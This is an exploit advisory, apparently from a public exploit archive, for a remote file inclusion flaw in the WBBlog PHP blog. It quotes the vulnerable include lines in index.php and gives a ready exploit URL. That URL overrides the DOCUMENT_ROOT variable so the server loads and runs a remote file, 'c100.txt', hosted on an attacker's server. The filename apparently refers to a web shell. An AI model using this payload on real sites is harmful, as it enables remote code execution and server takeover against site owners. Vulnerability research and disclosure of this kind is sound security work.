Exploits Code
view source
print?
#################################################################
#
# WBBlog Remote File Inclusion Vulnerability
# Found By: mr_me
# Download: http://liqua.com/post/WBBlog.html
# Tested On: Linux
# Note: For educational purposes only
#
#################################################################
 
Remote file include in index.php on lines 25 and 26
 
8<-------------------------------------snip-------------------------------------8<
 
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/config.inc.php');
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/init.inc.php');
 
8<-------------------------------------snip-------------------------------------8<
 
exploit:
 
http://[server]/wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://[evil server]/c100.txt?

Exploits by Month (2010)
Jul (14) May (4) Apr (21) Mar (18) Feb (9) Jan (30)
TS Promotion